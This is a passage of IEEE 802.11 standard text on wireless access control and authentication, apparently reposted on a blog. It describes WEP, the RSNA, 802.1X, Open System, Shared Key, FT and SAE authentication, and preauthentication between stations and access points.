4.5.4 Access control and data confidentiality services
4.5.4.1 General
Two services are required for IEEE Std 802.11 to provide functionality equivalent to that which is inherentto wired LANs. The design of wired LANs assumes the physical attributes of wire. In particular, wired LAN
design assumes the physically closed and controlled nature of wired media. The physically open medium
nature of an IEEE 802.11 LAN violates those assumptions.
In a WLAN that does not support RSNA, two services, authentication and data confidentiality, are defined.
IEEE 802.11 authentication is used instead of the wired media physical connection. WEP encryption was
defined to provide the data confidentiality aspects of closed wired media.
An RSNA uses the IEEE 802.1X authentication service along with enhanced data cryptographic
encapsulation mechanisms, such as TKIP and CCMP to provide access control. The IEEE 802.11 station
management entity (SME) provides key management via an exchange of IEEE 802.1X EAPOL-Key frames.
Data confidentiality and data integrity are provided by RSN key management together with the enhanced
data cryptographic encapsulation mechanisms.
4.5.4.2 Authentication
IEEE 802.11 authentication operates at the link level between IEEE 802.11 STAs. IEEE Std 802.11 does not
provide either end-to-end (message origin to message destination) or user-to-user authentication.
IEEE Std 802.11 attempts to control LAN access via the authentication service. IEEE 802.11 authentication
is an SS. This service may be used by all STAs to establish their identity to STAs with which they
communicate, in both ESS and IBSS networks. If a mutually acceptable level of authentication has not been
established between two STAs, an association is not established.
IEEE Std 802.11 defines four 802.11 authentication methods: Open System authentication, Shared Key
authentication, FT authentication, and simultaneous authentication of equals (SAE). Open System
authentication admits any STA to the DS. Shared Key authentication relies on WEP to demonstrate
knowledge of a WEP encryption key. FT authentication relies on keys derived during the initial mobility
domain association to authenticate the stations as defined in Clause 12. SAE authentication uses finite field
cryptography to prove knowledge of a shared password. The IEEE 802.11 authentication mechanism also
allows definition of new authentication methods.
An RSNA might support SAE authentication. An RSNA also supports authentication based on IEEE Std
802.1X-2004, or preshared keys (PSKs) after Open System authentication. IEEE 802.1X authentication
utilizes the EAP to authenticate STAs and the AS with one another. This standard does not specify an EAP
method that is mandatory to implement. See 11.5.5 for a description of the IEEE 802.1X authentication and
PSK usage within an IEEE 802.11 IBSS.
In an RSNA, IEEE 802.1X Supplicants and Authenticators exchange protocol information via the IEEE
802.1X Uncontrolled Port. The IEEE 802.1X Controlled Port is blocked from passing general data traffic
between two STAs until an IEEE 802.1X authentication procedure completes successfully over the IEEE
802.1X Uncontrolled Port.
SAE authentication or Open System 802.11 authentication is used in an RSN for infrastructure BSS. SAE
authentication, Open System 802.11 authentication, or no 802.11 authentication is used in an RSN for IBSS.
SAE authentication is used in an MBSS. An RSNA disallows the use of Shared Key 802.11 authentication.
A STA may be authenticated with many other STAs at any given instant.
Because the IEEE 802.1X authentication process could be time-consuming (depending on the authentication
protocol in use), the authentication service can be invoked independently of the association service.
This type of preauthentication is typically done by a STA while it is already associated with an AP (with
which it previously authenticated). IEEE Std 802.11 does not require that STAs preauthenticate with APs.
However, authentication is required before an association establishment is complete.
If the authentication is left until reassociation time, this might impact the speed with which a STA
reassociates between APs, limiting BSS-transition mobility performance. The use of preauthentication takes
the authentication service overhead out of the time-critical reassociation process.
SAE authentication is performed prior to association and a STA can take advantage of the fact that it can be
IEEE 802.11 authenticated to many APs simultaneously by completing the SAE protocol with any number
of APs while still being associated to another AP. RSNA security can be established after association using
the resulting shared key.
No comments:
Post a Comment